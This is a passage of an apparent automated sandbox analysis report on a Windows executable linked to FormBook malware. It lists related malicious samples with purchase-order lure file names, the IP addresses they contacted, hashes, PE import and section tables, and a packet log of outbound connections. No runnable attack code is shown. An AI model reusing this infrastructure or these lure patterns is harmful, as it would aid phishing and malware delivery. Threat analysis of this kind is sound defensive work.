                                                                • 85.159.66.93
                                                                Quote 05-302.lnkGet hashmaliciousFormBookBrowse
                                                                • 85.159.66.93
                                                                LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                                • 85.159.66.93
                                                                ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                • 85.159.66.93
                                                                PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                • 85.159.66.93
                                                                New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                • 85.159.66.93
                                                                INTERNET-CZKtis238403KtisCZSOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                                • 81.2.196.19
                                                                New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                • 81.2.196.19
                                                                ExeFile (156).exeGet hashmaliciousEmotetBrowse
                                                                • 81.2.235.111
                                                                ExeFile (171).exeGet hashmaliciousEmotetBrowse
                                                                • 81.2.235.111
                                                                VvlYJBzLuW.elfGet hashmaliciousMiraiBrowse
                                                                • 194.182.83.4
                                                                UDxMi3I3lO.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                                                • 81.2.194.105
                                                                DPqKF5vqpe.exeGet hashmaliciousLummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SystemBCBrowse
                                                                • 81.2.195.204
                                                                DASERA LPO PMT-4 FURNITURE 28052024.pdf.exeGet hashmaliciousFormBookBrowse
                                                                • 81.2.195.12
                                                                nUjgRSb1i7.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                • 80.211.203.249
                                                                rfdJU2NvQi.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                • 80.211.203.249
                                                                MULTIBAND-NEWHOPEUSPURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.95.29
                                                                Untitled.emlGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                • 209.74.66.140
                                                                Untitled.emlGet hashmaliciousUnknownBrowse
                                                                • 209.74.66.140
                                                                EF520_B18Payment_2600_D3781_N3895_L1029_H482_X4782_E3819.exeGet hashmaliciousUnknownBrowse
                                                                • 209.74.95.146
                                                                https://lookerstudio.google.com/s/u2hbu8O7xHgGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                • 209.74.66.141
                                                                ibero.batGet hashmaliciousSilverRatBrowse
                                                                • 209.74.95.136
                                                                CY51PaymentAUG-38122-507-783-17531I-39UW-J471-3017-3C762-M732.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                • 209.74.95.146
                                                                H#Payment03-28S2-J5892-C938-KL105-DN782-FN823-CD47912-SC8923-19574.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                • 209.74.95.146
                                                                X4kQxc5ZQWGet hashmaliciousUnknownBrowse
                                                                • 209.74.85.117
                                                                e8AjLx6LexGet hashmaliciousMiraiBrowse
                                                                • 209.74.85.106

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Temp\6U0173jM

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\replace.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                Category:dropped
                                                                Size (bytes):196608
                                                                Entropy (8bit):1.1239949490932863
                                                                Encrypted:false
                                                                SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                MD5:271D5F995996735B01672CF227C81C17
                                                                SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\Anglophile

                                                                Download File
                                                                Process:C:\Users\user\Desktop\PO2024033194.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):287232
                                                                Entropy (8bit):7.994900553375555
                                                                Encrypted:true
                                                                SSDEEP:6144:vOlQEven4RUlRJbWvqrVbQ6xF2OM+3r17D1G76FqgQHJc5FzRyqpmun:NEven4GzbbQy/vrlD1NoJJcbzRyqpd
                                                                MD5:2888406AC91571338B951A3911E40F1F
                                                                SHA1:0BDE462AAD3BEF150B13479A66B813464D6950FB
                                                                SHA-256:86919A292728EEC1CB2621CCA281E71923736DDD6FE97554CF945D428EF141CD
                                                                SHA-512:61A61DCB58ABCE72ABDF6EBA914C3B8485FE866DF4FC96021388985318955FF1A49378C648914EC52ECB56A4EA63451381BCA764814AC2EDE99EF5557169C786
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:t.p..N2UE.._..m.CR....O=...2UEQPKVDMESQ7CQ7159L5IDN2UEQPK.DME]N.MQ.8...4..of=,"p;$+*72<. 0Y_ZMlW,d<G;e8>k...e>>S&.:<?.L5IDN2U<PY.k$*.n1P.lWV.#.~.U._...j$*.I...mWV.k%V!y.U.EQPKVDME..7C.605....DN2UEQPK.DODXP<CQg559L5IDN2U.DPKVTMES13CQ7q59\5IDL2UCQPKVDMEUQ7CQ7159,1IDL2UEQPKTD..SQ'CQ'159L%ID^2UEQPKFDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ715.8P10N2U..TKVTMES.3CQ'159L5IDN2UEQPKvDM%SQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDME

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.567744163701219
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:PO2024033194.exe
                                                                File size:1'415'239 bytes
                                                                MD5:1eebf0360b466749cd46f9d7971c35cd
                                                                SHA1:563fe4fd1b3ff569adfe99ad15791e78a09c486f
                                                                SHA256:59965600d8885fbd982a88ecf800b6a8cf6714fff11fcbe5123a7fc72781cf23
                                                                SHA512:506595431d183b1448440139f172a6ba4882bad7b938bb77286f8cf27d370523839572406734c85d64db047f67d42f981ff93645847cec95667e7dbbcac11111
                                                                SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCyZhLtqvcucW6WdJfDqbtfnZjr5jgs5:7JZoQrbTFZY1iaCyjLtacq6W3ubtfZnf
                                                                TLSH:5165F122B5C69076C1F323B19E7EF76A963D69360336D2DB37C81E211EA05512B39723
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                                File Icon

                                                                Icon Hash:1733312925935517

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x4165c1
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:0
                                                                File Version Major:5
                                                                File Version Minor:0
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:0
                                                                Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                                Entrypoint Preview

                                                                Instruction
                                                                call 00007FC10C80EC6Bh
                                                                jmp 00007FC10C805ADEh
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                push ebp
                                                                mov ebp, esp
                                                                push edi
                                                                push esi
                                                                mov esi, dword ptr [ebp+0Ch]
                                                                mov ecx, dword ptr [ebp+10h]
                                                                mov edi, dword ptr [ebp+08h]
                                                                mov eax, ecx
                                                                mov edx, ecx
                                                                add eax, esi
                                                                cmp edi, esi
                                                                jbe 00007FC10C805C5Ah
                                                                cmp edi, eax
                                                                jc 00007FC10C805DF6h
                                                                cmp ecx, 00000080h
                                                                jc 00007FC10C805C6Eh
                                                                cmp dword ptr [004A9724h], 00000000h
                                                                je 00007FC10C805C65h
                                                                push edi
                                                                push esi
                                                                and edi, 0Fh
                                                                and esi, 0Fh
                                                                cmp edi, esi
                                                                pop esi
                                                                pop edi
                                                                jne 00007FC10C805C57h
                                                                jmp 00007FC10C806032h
                                                                test edi, 00000003h
                                                                jne 00007FC10C805C66h
                                                                shr ecx, 02h
                                                                and edx, 03h
                                                                cmp ecx, 08h
                                                                jc 00007FC10C805C7Bh
                                                                rep movsd
                                                                jmp dword ptr [00416740h+edx*4]
                                                                mov eax, edi
                                                                mov edx, 00000003h
                                                                sub ecx, 04h
                                                                jc 00007FC10C805C5Eh
                                                                and eax, 03h
                                                                add ecx, eax
                                                                jmp dword ptr [00416654h+eax*4]
                                                                jmp dword ptr [00416750h+ecx*4]
                                                                nop
                                                                jmp dword ptr [004166D4h+ecx*4]
                                                                nop
                                                                inc cx
                                                                add byte ptr [eax-4BFFBE9Ah], dl
                                                                inc cx
                                                                add byte ptr [ebx], ah
                                                                ror dword ptr [edx-75F877FAh], 1
                                                                inc esi
                                                                add dword ptr [eax+468A0147h], ecx
                                                                add al, cl
                                                                jmp 00007FC10EC7E457h
                                                                add esi, 03h
                                                                add edi, 03h
                                                                cmp ecx, 08h
                                                                jc 00007FC10C805C1Eh
                                                                rep movsd
                                                                jmp dword ptr [00000000h+edx*4]

                                                                Rich Headers

                                                                Programming Language:
                                                                • [ C ] VS2010 SP1 build 40219
                                                                • [C++] VS2010 SP1 build 40219
                                                                • [ C ] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 SP1 build 30729
                                                                • [ASM] VS2010 SP1 build 40219
                                                                • [RES] VS2010 SP1 build 40219
                                                                • [LNK] VS2010 SP1 build 40219

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                Imports

                                                                DLLImport
                                                                WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishGreat Britain
                                                                EnglishUnited States

                                                                Network Behavior

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Sep 22, 2024 17:41:04.086803913 CEST4971880192.168.2.6172.81.61.224
                                                                Sep 22, 2024 17:41:04.091708899 CEST8049718172.81.61.224192.168.2.6
                                                                Sep 22, 2024 17:41:04.091821909 CEST4971880192.168.2.6172.81.61.224
                                                                Sep 22, 2024 17:41:04.101147890 CEST4971880192.168.2.6172.81.61.224
                                                                Sep 22, 2024 17:41:04.106101036 CEST8049718172.81.61.224192.168.2.6
                                                                Sep 22, 2024 17:41:04.719127893 CEST8049718172.81.61.224192.168.2.6
                                                                Sep 22, 2024 17:41:04.720905066 CEST8049718172.81.61.224192.168.2.6
                                                                Sep 22, 2024 17:41:04.720993042 CEST4971880192.168.2.6172.81.61.224
                                                                Sep 22, 2024 17:41:04.723876953 CEST4971880192.168.2.6172.81.61.224
                                                                Sep 22, 2024 17:41:04.742607117 CEST8049718172.81.61.224192.168.2.6
                                                                Sep 22, 2024 17:41:19.911103010 CEST4972080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:41:19.954582930 CEST804972081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:41:19.954699993 CEST4972080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:41:19.964936018 CEST4972080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:41:19.993530035 CEST804972081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:41:20.781038046 CEST804972081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:41:20.781220913 CEST804972081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:41:20.781276941 CEST4972080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:41:21.469098091 CEST4972080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:41:22.488272905 CEST4972180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:41:22.517143965 CEST804972181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:41:22.517252922 CEST4972180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:41:22.527823925 CEST4972180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:41:22.561120987 CEST804972181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:41:23.331474066 CEST804972181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:41:23.333440065 CEST804972181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:41:23.333503962 CEST4972180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:41:24.031600952 CEST4972180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:41:25.050311089 CEST4972280192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:41:25.056299925 CEST804972281.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:41:25.056391954 CEST4972280192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:41:25.065902948 CEST4972280192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:41:25.070806026 CEST804972281.2.196.19192.168.2.6
